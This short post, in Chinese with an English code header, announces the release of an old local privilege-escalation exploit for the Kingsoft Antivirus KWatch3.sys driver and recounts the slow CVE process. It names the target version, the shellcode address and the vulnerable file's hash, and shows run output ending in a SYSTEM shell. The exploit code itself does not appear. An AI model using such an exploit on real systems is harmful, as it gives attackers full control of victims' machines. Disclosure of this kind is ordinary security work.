一个多年前的本地提权漏洞利用,针对金山毒霸 KWatch 驱动程序版本 2009.3.17.77。
我在 2014 年 1 月报告了该问题,并在 8 多年后才收到 CVE 通知。我决定上传此内容,因为找到自己的旧代码并且它花了那么长时间,实在很有趣。
因此,尽管 CVE 是新的,但这肯定不是新漏洞——快速搜索已经显示了多个针对相同漏洞的报告。
我仍然感谢 IPA 尽到了他们的职责,并让我度过了愉快的一天。
易受攻击的文件似乎是 ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/